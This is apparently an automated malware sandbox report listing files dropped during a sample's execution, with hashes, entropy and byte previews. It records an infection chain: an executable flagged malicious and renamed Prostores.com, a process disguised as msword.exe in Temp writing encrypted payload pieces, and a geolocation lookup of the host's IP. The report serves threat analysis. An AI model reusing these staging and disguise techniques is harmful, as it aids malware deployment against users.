                                      Preview:.....#.<....d.Dm{R..fR.@^..J"..H$.|...H.[.....#*W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6*...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).*w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^........*......k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK.*.^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..*T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u
                                      Process:C:\Users\user\AppData\Local\Temp\677826\Prostores.com
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):963
                                      Entropy (8bit):5.019205124979377
                                      Encrypted:false
                                      SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                      MD5:B62617530A8532F9AECAA939B6AB93BB
                                      SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                      SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                      SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                      Malicious:false
                                      Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):26604
                                      Entropy (8bit):5.0530691163715815
                                      Encrypted:false
                                      SSDEEP:768:SLbV3IpNBQkj2Uh4iUxkOZhxiardFuJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOcqd8J+OdBOtW
                                      MD5:618CA8D25C8C3312608E689D44BE6D02
                                      SHA1:34070D4AECA3905C1846646EAD276E1DC915E828
                                      SHA-256:08FFCB482F70C42C270CB5AEB36C5B4F2A6D0B72B608C2678DDACB3EC09EE518
                                      SHA-512:ED77AA9441988D6B72D56D92B22DF75385A2E0D3B6EDF97DD00E45D8C7CE2071F58DE8C69C8076F57A0A45D8C0EAF392C8FF4DAC6D079431F1481AEDF7EEBABF
                                      Malicious:false
                                      Preview:PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):733484
                                      Entropy (8bit):7.999727303580045
                                      Encrypted:true
                                      SSDEEP:12288:7EjETXeEPYtANOcxShg6LO5mrcPIez2EsXwEA0cIYJU9YoULsEpW2bhhbaIkJflE:7EE9Iln+6LcmoPIezgAv0JioULJpph93
                                      MD5:C82D57C04AAD2BD54DFEED7CBFEE8ECB
                                      SHA1:C564CFCA3BCC3A26128917C94AB4E44F9CD25BBE
                                      SHA-256:4E285732BD17A06AE4BE71BEAAD8E5CE4DBD211F2888B4571D5D0C716764C767
                                      SHA-512:9D3102EFB33D4B5A510D24D1B7F313C66CB502B6B7572EF2C10538D3B48B8D63D7CAD41E5B9596181B142A7FDFD27727C6541A55307B4C4F793B957ACD7ECEDB
                                      Malicious:false
                                      Preview:.....#.<....d.Dm{R..fR.@^..J"..H$.|...H.[.....#*W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6*...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).*w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^........*......k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK.*.^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..*T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):6.704539217194939
                                      Encrypted:false
                                      SSDEEP:768:9pQLiype/ehju5rWiq/DOSOlwRDNFoDu+XdoXSMf17+sVXnQkdFLILu8rbPDmhdu:9eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CK
                                      MD5:DD266093B6C3933B83753002FA856A2E
                                      SHA1:39D54DC7D7DC9A7C7DD626046096730E730C22D4
                                      SHA-256:5FD8ED3BCC118A3E4DA9669B07497F3933245FDF4451276394858022E8F867BB
                                      SHA-512:A6CAB1788FBCE3DC329F84B2CFE034D67CE909A0DCF871F22E51AD11E17A26201F894280568FA46C2DCFFA74CD6E9BE4287201617288A1C171DEDF52F370B7C5
                                      Malicious:false
                                      Preview:..x.........} .......0f......Q.u..u.j..p.......]..M ..`+J................}.3.VS.].WS.u.ja.u..X........u.............P...WSh.&J..:...V.u.WS.u.jb.u..".....(..t.WSh.&J......V.u.WS.u.je.u........(..t.WSh.&J......V.u.WS.u.jT.u........(....z...WSh.&J......V.u.WS.u.jY.u.......(....j....K...S.u.3....u.....u.P.u............&....u..u.h.&J..l...S.u..u..u.j..u.......$.E..H...xC....>.u..E..u........./............E..H...x.......u..E..u.......................!..2......E..H....|.....} ......$ f....P.u..u.j.Q.D....u..u.h.&J..|.....w..b...t...p......H...tZH...tD...u..E..H.....w........n.....u.f..uu.j.Y.} ......$0f....P.u..u.j...u..u.h.&J.......u..u V..`+J........}..].WS.u.jI.u.................WSh.&J.......u VWS.u.jM.u........(........WSh.&J.......u VWS.u.jS.u.......(...._...WSh.&J......u VWS.u.jp......u..u..u.jX.u..............E..@.....j........a.......E.....L.......P....u..u.P.......x....................4.......E.3.P.u.....Y.........E.9p t .E..u.P...Y.........M..M..M....M....3.+.j<^.
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):92160
                                      Entropy (8bit):7.998070494541723
                                      Encrypted:true
                                      SSDEEP:1536:164/pznuZpMquK4j4dDY6M6Kio9mtkSE5U7rHuBEeiXzqLd/R9+1V4Lm2etN0:84B6pMquTQY6M9iAtSEfBrieLd59+MLj
                                      MD5:21A1CAF7906CD79FA2F0C1CCB065C02F
                                      SHA1:35D20FB034F3587773695FBE05FB0984BE7CC12C
                                      SHA-256:0817E365A8A9BD66F18EBC955AF76D00EA70071573952988E9701F5944B12EC8
                                      SHA-512:4952E631E2B98F19CD4952F8F4CA7B422025E6111678A3AEE94197FD7E7B2F6DA5C8761CE9A9F2EC909F184B9172275C11A21CB430B6D90171115005D5733E59
                                      Malicious:false
                                      Preview:.....#.<....d.Dm{R..fR.@^..J"..H$.|...H.[.....#*W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6*...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).*w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^........*......k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK.*.^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..*T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):138240
                                      Entropy (8bit):5.980191824734651
                                      Encrypted:false
                                      SSDEEP:3072:Y0ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPI:YV14ZgP0JaAOz04phdyQ
                                      MD5:5D7F155185B7B7CE52433DF0895CD254
                                      SHA1:3DCF933C6895B843DBA20447C21F673F83EAFA9D
                                      SHA-256:EEA2D5CFCF7311B8E926741CA23552D11D43049753BBB2EFD835A6E7CA9FB396
                                      SHA-512:29A0603A0AF8E8E0D9A8E8A414D91EDCBF6E5236D8F4A1496EC84DB26DCEC2CFCAE133BB33AE87CCBB6442F54ABFE8CA450CF65515EC587BF551B583828A3318
                                      Malicious:false
                                      Preview:t.P.e........u..'.....2._^]....y,.t..A0.I,V.0.....%T5M....^.y..u%.=L*M..u..T5M...d}.@.T5M.j...j...|.I.3..U..}..t..u...(M..W......L)M.....L)M....u.3..-.@)M.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U..)M....VW.}..E...t7..99t..@...M..y..u..E...)M.P......P.....;.tGQ....9...=.u..~..u.3..3.M..~:...E.}.;.t.V....9...E.)M.P.;....M..{8..3.@_^....U..}..t..u...(M..c......L)M.....L)M....tY.@)M.V....0.F...t.9..)M.u....)M...F.P..<.I..f...}..t#.u..u...@.I..F...4.I.9.u..L)M...)M.^]...U..}..t..u...(M........L)M.....L)M....u.3..-.@)M.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...(M..{......L)M.....L)M....t$.@)M.j.j.j ......E..1.A..E..A.....I.]...U..}..t..u...(M..(......L)M.....L)M....u.3..h.@)M..E.....L.V.....0....D{....L..8....F|....E....t........E....t........Nl;M.t..u...7...E.......3.@^]...U..Q.}..t..u...(M.......L)M.....L)M.VW..........@)M.j.....0..P.E...\.I..}......#.+.....@.E....t.Wj..u...@.I...tb.}..t..u.j..u...@.I...tJ.~8.t?.....3.#.;....9E.t.j.;.u...L.I..FH
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):55296
                                      Entropy (8bit):7.996221667590853
                                      Encrypted:true
                                      SSDEEP:1536:5vS3nn2ZA7/kkNlk59NouS6HSV4y7ugw7wU140:5vSGZAzkkjkPNxS6HSGaugwz
                                      MD5:9AB6CC30C12CEB5D4F1BB3A55D4FE455
                                      SHA1:74C250C42E24E6DF717B49A4BED3729EB9064CAD
                                      SHA-256:3A83E692C74855B6DC24C7067D4308031310A678E4C57EF45E7D3EC9256844A1
                                      SHA-512:C96341AFA3630FA9212FF91D860CBFD37D135C52386A316C3B161BC0DF307486D4BF19FB7023532AE26380643F010BD7427BA5AB3768EE3E3F6D4BDD09921144
                                      Malicious:false
                                      Preview:.C|,..X@`.C(r...E...q.[$.t.'.:..j...-....`./].....KD. .G+..... VP&.G.\..AH....^............f...M...&.......EAU........,.3A..e.....r...k.4..{.o..K.7}.".....[.Dq0Gu.. w..&.Q.bpF..._2..bt.DJ.cc....f^.?.O...pL.s^..-d.......|..v.......T.:.....J-0........qB.%.........j...sr.n.+.j........n.....V..~..&.....i..w5}..u....F...*....5d....rT.......;..)Omq........s.gIt..H..g.j/.......<..........T.)..B.&.....<..;KG.R....:s._.v.07..Vl.&:..Y.%...'.ljnw.t.`Vq..qE.b5J. 0.. .B .].A..n. ].7..{........x.?<.'.fX...:....m.......n.+ .kr...**.&{.M...`..a,X=;..:6Z.......3}...V.3...,..h..1d.....K..N<~.... .9...xHnF...X9...!...=.'V.Auy. ...e.........!..U..R...L../.....l#..o..:m7_gC.e.*...e.@...X...V.NCK..|..3..zER):.pt....M...!r_I...(...D./.V.U.i.7..I.I...[P..s...9..~)..UK5.}e.~..%.q..@,...._...$>..H...J..Dpj.1.........!...<.q...._*..C.\...V..o.......`%l.>&._`9.Y.......m.R..E.?.(.J%Oy.....3. ..P.z7..[v..z...h.....qiM.! .vo..9...zb....h........@.&..
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):97280
                                      Entropy (8bit):6.581173789840171
                                      Encrypted:false
                                      SSDEEP:1536:A6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfT+:AypIbv18mLthfhnueoMmOqDoioO5bLeF
                                      MD5:459740D3AA55D6BB677047A043A11049
                                      SHA1:20002F1D45FEA6EED6AFF3EAD22CFF091D78B41A
                                      SHA-256:4C4F6EF591CDD3D235FE09DF1A90CD5AF14C756A908BE132C13A9EDE2B7A900D
                                      SHA-512:B51D14C8DA04FFF2ED8D309B643A91F679BF2A31638B8E91B7DE9BB7CFE7F3AA8590432B685621B871A004DE2D8AEAFC0CCF057AE5F55BCB0661C7172105CB34
                                      Malicious:false
                                      Preview:...N........t$...........j.W.t$ ...t$(.C%.............C..0......N........L$........n..._^3.[..]...U..E.V.@..0...~....F.... .....u..u....F....&..F.....3.^]...U...TSV.5,.I.3.Wh....S....h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...E.E.P.E.........I...uN.u....S......3.B.V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X...0.I.SP...H.....q.....E..t.;D..t.C...~..u....~............F......._^3.[....U... SVW.E...P....I...4.I.P.E.P.......@....E..}.)E..E.)E.....u`.M...t..3..j.CSV.Rz...M..E.3..M.WSPV.}.]..(.......M..]....E.S.E..E.SPV.}.]..........M..:....~.G....?.....u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...B......u..u...}.......F......!.G........3.C;.u..u...}......^..>_^3.[....U..V.u....W...~..u..F..H.....V.j.P.J..2.p...P...h...P....".._3.^]...U..E.V.@..0...x....F....L.....u..u....@....&..F.....3.^]...U..Q.E.SVW3..M.G.x..r..@..H..........~O.E.3..~F.@..0........F
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):52224
                                      Entropy (8bit):7.996119878250014
                                      Encrypted:true
                                      SSDEEP:768:U/Q+dzD31O3KAFDxDE5twt8C4wDBEZNBclMWOWQUvjBziwpfHS28mILe3VBGranP:U/Q+5MJFlMVCPGNelMUjtzpfl8HdCCS
                                      MD5:9C9C85945089A8C81528A6B23A209E20
                                      SHA1:599E249D010D0A40F3914D82AF710C655A1DA778
                                      SHA-256:71E8E4C78A2238179F1D01D2C280CAF8CCA1B62379C51FCEA39FAB2800990D5C
                                      SHA-512:26159EF952317A38560F91D10CCF89F9C652CFEFC73A15681F3554F36AE53326322ABB3466900466DBD0868971DF7A9D1C2D718FACFE87BECD13B7390438E9F0
                                      Malicious:false
                                      Preview:......CC...m..Y..#. .=..C.r.t...I$.#...l.7.-_..E8 ..x9....k.V9.'."..1...D".?.3z|...\.. v...S.(..n.`)=/...cVF..S...gd`.Zs|=... .%.X59.MW.]....Nk....fSN.f.F..uB..`.CE...].j#.....P?cl.<...0.2.!..t!...C.V..8O.7W...yqpy.v...#{dW.E......fm.+.W.b.OOm....{,.~....m.e.......HX.....M.c..c%.eb...O..U..._....n..v....=T..^.K...b.0.M_..F(......C...S..^..*.R|....D..4...H~.9t;..^.4..3..n......V;|.&M.s...yc...pls...R.`.`L..s..Vm.]...Q...w.<..1p......~8..^e.U...6...$....k....`.:E.{,......s..G~.W`c...\........A.P.^.......i..P)..N.&p.N.,.....#<}.w..j).c1....c.......;[.......,S.....d-R......Y.._J.1..h......{nRh.j..Q.......... _......_C.t.1...........T...h.`.*..e.....4.6<r.z[.Q..W ?X5.pHeg..RA.m7.:....5.NnPC.N],.s_.n..$.y.eL.S>..c.W.&o|.Q.u.;..jb.l.Y.]...NY.!.!{?.........E.......+.x.W.X.)q.........(.y....'.>..........;."8..S.C...s.Oys....d.m)..m...su.|...9..W=.....n...?.rBqV.&..`'../........Xt....t.wc..U......H.C...}.E..TFk.[.3.Te.X....}1...{.[.n.V.. {.Rwt..Y.....
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):55296
                                      Entropy (8bit):7.996893434432179
                                      Encrypted:true
                                      SSDEEP:1536:Af058ph2Px8y8B71tsH84JDXInbJUYQkOy8n20NaupzF:Ae62my8Z1gLDXInbhQkOyA208upzF
                                      MD5:C7C08C021E27B2EEB0824937A10AC43D
                                      SHA1:3FFEC4974BCCF5A2CB9AD02411DBAD5B62F810A1
                                      SHA-256:4F6A15C2BC947318BA8BCCF9BE0948BCCB6740D1F06CCD5ECF9296609166E524
                                      SHA-512:0B539D2800C0FF28841F478368838B12CEE02019145275432CC7FD9767BCED34F444D1C77C50804DA36E00942FB19AC0AC65C73918D7F2E96EF77EBA28387D14
                                      Malicious:false
                                      Preview:Y..y.Y.X..(..C..m.pP..1.W.6.Xc.sI......daE..Z.y.>.U!....-...LX.vgm._U....{XU..!T..&..j:&...........!W..^Lh.[..}..........-.o.|2=#..c...~.I..|K.<Uj.z0..(.KZ.e......%~GL...E..j..M..L..2.KC.....(7.E.v!...".....(IW)..T.w.... ..Uk..^:.Tx/f..$oY.)N)..:LW].g.>...g.....(...(C.<f...6..`D.r..../w.-..I...0..=........S....d.0...W{.....RB...R.g..z....TM.dM:m....P...!3.;.i.!W.~.e.'........u...a...ajF.[M.Oj}..4...n.r..q].xT.6...{.I..)`....jiJ..2.U`......{..}..........X.U.md..,.U .9|W.=.V.1Yx..,..%....t.8...G..G..D..O..S{.;oq<,xW...p,.B.....F..$MR....@"/...D.^....b..)^[.AI......b....(zn8.1.X5..'...|.1j..=''XD...Yumt..Of..b>.....O"Of~..x..3j..'eW.V....K.LB ...i..R...u......KN.#...pf).....p.Q..D=g......:......r..[.f.n.....*D-#?...g..3....;%.y5kL...8s.....J/.......#.oY$..^Z.@B.[...V.B..B[s.a.Y.).q.".O.......u...&...<{..r.1J...'G.2....MFN...'.1.C..3!...b..^...d..........>q....x..W...LH.{..G.v..l.&|o.Z.T.un.K....E^......C.6.*xcu...@.#u....*.f..Y.....1.
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):117760
                                      Entropy (8bit):6.296704167940761
                                      Encrypted:false
                                      SSDEEP:3072:SZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWq:SK5vPeDkjGgQaE/lM
                                      MD5:1D1169E8E8C0DE7A5E7E1BABD8470DD6
                                      SHA1:4406EB665FC118B1767464F0CE2484C97EB4880B
                                      SHA-256:F20431C1D82AB151DDE7271CD37A6F208FCD45272D9A83980CCC3DD72D704F40
                                      SHA-512:4E7562F6102F1265BF5C64509ADC68769680110BFDD2333C977A3404CEA3D014960EF1BE276BFF241761C9E5135711D2DBA53980E5BB6EA83375E1951ECCD351
                                      Malicious:false
                                      Preview:MechanicalDlModularRuSchedulingVisibilityProposalsClimb..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.......................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):146432
                                      Entropy (8bit):6.6465980351029454
                                      Encrypted:false
                                      SSDEEP:3072:DtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVno:BNPj0nEo3tb2j6AUkB0CThp6vmVno
                                      MD5:39C723A69E6F51230D209B72F81ABE9B
                                      SHA1:B0F058579D60E5A6C612F60732FDF3D7C8E86A9C
                                      SHA-256:4A1B5FF59395FC0991987B588918649871A3106340A3D6F572C3FA232D59FBC9
                                      SHA-512:04858B44C1DB4B307F0FB2C853FFB0C1149A23166C670AAA407D191AB47CE21702858D4B30AABDDEC253652868E19B1A01ACF1E2A5AB776581E191CA38F8806B
                                      Malicious:false
                                      Preview:.E................E...6........E............E............E...........jR.d...f;.r.j0..[j9Xf;.w..r..u........f;.s.j=.9j:.5j..1j9.-.E...T....Qj0..j*..j>...u.j...j..E.Y...!...j..E.Y...'..........G.........E..........E...4....E..03..v............U...............E..E..P.E.P.M.....YY........~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}...
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):70656
                                      Entropy (8bit):7.997921805668066
                                      Encrypted:true
                                      SSDEEP:1536:4y+7CHT4k9YRtUo7NA2lVU2vBK8D3DhHMl+BAD1g:4iHTb9YRtU8RrU2vsgDtz61g
                                      MD5:FA2010085679EEC632F3107657E30A81
                                      SHA1:74611BE98EA26266232DD5A92F465D09273F76F6
                                      SHA-256:B449025FE3C3A0598C9D9BCF2D8C631FBA1B3C4144237D78FE6ECDD1574E2211
                                      SHA-512:5D2346B043F37469BE69690DA25B4257D8554A24B48214DC91E5957971184E56DB49AECD1CD2379D27BA0E31E1F31BEF07D974066AD5C92B95CAA16811126CA5
                                      Malicious:false
                                      Preview:.x*..GaQ.#....^.....Y.u..S.*.)}S._...=d-P\Z.ZN1\....3.eF.9.MV..H8#Y.}r...ruV....t...M?6.....m..M.#.W..2....R...~..OQ- ..X..b....O....1.f...N.o...lZ..AMD.i](./....f.J.|..Ay..}jK.vA...|.....'..9BQ...b?....Q...%b..$l.X....._..F.....dS.;.....1/....L.....h.6......D..-/.r^.,.....F...Hy&.T7O....V.<R....O..:..Q$.d._..N..@...QSw..V.....l...E.9..#.^.%.z.......p..k...Z...PF[..|....b.(y.ep..mAht&..E..P..aD.. ?x"f...?.W.Q...../.A.j.m@t#.]...V.#...Z.n.4...>.l.7.%..$!....m..{e.c.......8_5)..eJU.?......-.Z.]1.._...\%...I.N....L.h.S ....7(..}.t.c.o.......!.T=w...A)$..X.....0g.|.O;.....t..q.....ai5{..z.Om<g..g:..z.f..C..j^N.!d.V.u..s..Y....7.MA..|{...U{..v... j=.=.}2...g..TU.|..T..".....}.9...n..F.e.....:UU.......^..y.......R#Z0...33..IY'8u.rP.D|.N.nN....G~..........Ib.q.fN...J.j......:..V..}...'.y8y\.d.ZN...w`.o/.^..t@.A..|......".....7f..&..#....u.B...):.....X....A...YRF.l...6.v.jjJ.w,.o.}<.....M^.*.......|.........auRtO.I}...h9...W.....+a..R.!y...i...E.....
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):246
                                      Entropy (8bit):3.5065515051498046
                                      Encrypted:false
                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8wWClAlfH:Qw946cPbiOxDlbYnuRKAN/
                                      MD5:BF0D8FB373F1B202DFE651B32AA4DBD1
                                      SHA1:B34935D6FFEC344FF6F16A1D6AB57B2CDEB86D75
                                      SHA-256:F9F6BB3D23576C0FBB41BA4D85353C8773978E8115E0C2C240FEBDA882CF145E
                                      SHA-512:C05C2E8D813A6A0E3AD35856CEBC9D501FA5E9CF1C2FDCABF4E353DB73C25D69D615A7C2D069246645B238867D886DCBD993CD12DEE1821E10BFBD5E8F9B1BB7
                                      Malicious:false
